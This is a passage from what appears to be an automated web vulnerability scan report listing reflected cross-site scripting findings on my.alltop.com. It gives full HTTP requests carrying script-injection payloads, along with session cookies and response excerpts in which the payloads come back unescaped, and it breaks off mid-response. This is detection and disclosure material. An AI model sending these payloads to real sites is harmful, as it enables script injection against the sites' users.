Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:00 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:00 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha//%2522ns%253D%2522netsparker%25280x00013E%2529)66da4"><script>alert(1)</script>b6fc588523a" method="post" accept-charset="utf-8">
...[SNIP]...

1.19. http://my.alltop.com/alpha//%2522ns%253D%2522netsparker%25280x00013E%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha//%2522ns%253D%2522netsparker%25280x00013E%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feafe"><script>alert(1)</script>cbd239d3f08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha//%2522ns%253D%2522netsparker%25280x00013E%2529)?feafe"><script>alert(1)</script>cbd239d3f08=1 HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:57 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha//%2522ns%253D%2522netsparker%25280x00013E%2529)?feafe"><script>alert(1)</script>cbd239d3f08=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.20. http://my.alltop.com/alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45ea3"><script>alert(1)</script>bf8f40a85bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e45ea3"><script>alert(1)</script>bf8f40a85bb/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e45ea3"><script>alert(1)</script>bf8f40a85bb/" method="post" accept-charset="utf-8">
...[SNIP]...

1.21. http://my.alltop.com/alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad76e"><script>alert(1)</script>a060fc7402 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/?ad76e"><script>alert(1)</script>a060fc7402=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:47 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:48 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:48 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/?ad76e"><script>alert(1)</script>a060fc7402=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.22. http://my.alltop.com/alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fb2"><script>alert(1)</script>af0a3693816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/Netsparker555a01dc7e30494e9aa81771d27cf02bc1fb2"><script>alert(1)</script>af0a3693816/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/Netsparker555a01dc7e30494e9aa81771d27cf02bc1fb2"><script>alert(1)</script>af0a3693816/" method="post" accept-charset="utf-8">
...[SNIP]...

1.23. http://my.alltop.com/alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d2e"><script>alert(1)</script>f6b21b62c05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/?47d2e"><script>alert(1)</script>f6b21b62c05=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/?47d2e"><script>alert(1)</script>f6b21b62c05=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.24. http://my.alltop.com/alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a9fe"><script>alert(1)</script>0e9ecb2b17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a6a9fe"><script>alert(1)</script>0e9ecb2b17/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a6a9fe"><script>alert(1)</script>0e9ecb2b17/" method="post" accept-charset="utf-8">
...[SNIP]...

1.25. http://my.alltop.com/alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d27"><script>alert(1)</script>e6d5411dcb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/?45d27"><script>alert(1)</script>e6d5411dcb8=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/?45d27"><script>alert(1)</script>e6d5411dcb8=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.26. http://my.alltop.com/alpha/a [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000135)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000135)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f64c"><script>alert(1)</script>6bc75d6c9d5 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000135)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000135)%3C/script%3E8f64c"><script>alert(1)</script>6bc75d6c9d5 HTTP/1.1
Host: my.alltop.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=160012002.1299617018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-414054026-1299617018360; alltop_v=5b0b0493d420fb34fe2dbc09755a84c8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; alltop_r=159_ALLTOP_TOPIC_ID_22441; __csv=62b61914aa0d8829; __csnv=3bbaea7f009e0cc0; __ctl=62b61914aa0d88291; __utma=160012002.1234645092.1299617018.1299617018.1299617018.1; __utmb=160012002.10.9.1299617157503; __qseg=Q_D|Q_T|Q_2891|Q_2782|Q_2781|Q_2369|Q_2361|Q_2360|Q_2359|Q_2358|Q_2357|Q_2356|Q_2342|Q_1213|Q_1153|Q_1152|Q_1151|Q_1150|Q_1145|Q_1144|Q_982

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=v515r1b50tmtvg1l5p6baknqe6; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:31 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=159_ALLTOP_TOPIC_ID_22441_68540; expires=Mon, 06-Jun-2011 20:50:31 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000135)%3C/script%3E8f64c"><script>alert(1)</script>6bc75d6c9d5" method="post" accept-charset="utf-8">
...[SNIP]...

1.27. http://my.alltop.com/alpha/a ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a

Issue detail

The value of the '"--></style></script><script>netsparker(0x000135)</script> request parameter is copied into the HTML document as plain text between tags. The payload a5039<script>alert(1)</script>01c425a7031 was submitted in the '"--></style></script><script>netsparker(0x000135)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a?'"--></style></script><script>netsparker(0x000135)</script>a5039<script>alert(1)</script>01c425a7031 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:05 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:05 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>a5039<script>alert(1)</script>01c425a7031" method="post" accept-charset="utf-8">
...[SNIP]...

1.28. http://my.alltop.com/alpha/a [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71875"><script>alert(1)</script>7227e96d4de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a71875"><script>alert(1)</script>7227e96d4de HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
